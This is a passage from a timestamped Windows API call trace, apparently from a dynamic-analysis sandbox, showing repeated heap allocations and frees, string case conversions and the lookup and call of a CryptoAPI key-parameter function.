| out: hHeap=0x1780000) returned 1 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0096.175] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0096.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0096.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0096.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0096.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0096.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0096.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0096.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0096.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0096.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.176] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0096.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0096.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0096.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0096.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0096.177] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0096.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0096.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0096.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0096.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0096.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0096.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0096.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0096.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0096.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0096.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0096.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0096.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0096.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0096.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0096.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0096.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0096.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0096.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0096.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0096.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0096.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0096.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0096.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0096.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0096.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0096.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0096.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0096.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0096.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0096.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0096.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0096.230] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0096.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0096.231] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2530, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2530*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0096.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0096.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.233] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0096.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 